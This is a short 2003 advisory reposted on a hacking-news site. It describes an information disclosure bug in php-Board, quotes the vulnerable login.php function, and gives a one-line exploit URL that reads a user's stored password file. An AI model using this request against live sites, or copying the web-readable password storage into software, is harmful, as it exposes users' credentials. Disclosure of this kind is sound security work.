Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » php-Board (php) bug

php-Board (php) bug

by Nikola Strahija on February 18th, 2003 There is informations disclosure bug in php-board.


PHP Code/Location :
같같같같같같같같같
login.php :
-----------------------------------------
function passwd2($user)
{
$password="nicht registriert";
if (file_exists("user/".$user.".txt"))
{
$fp = fopen("user/".$user.".txt","r");
$data = fgetcsv($fp,10000,"#");
fclose($fp);
$password=$data[0];
}
return($password);
}
-----------------------------------------



Exploit :
같같같같
http://[target]/user/[NICKNAME].txt



More details :
같같같같같같같
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools





[email protected]
http://www.phpsecure.org


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »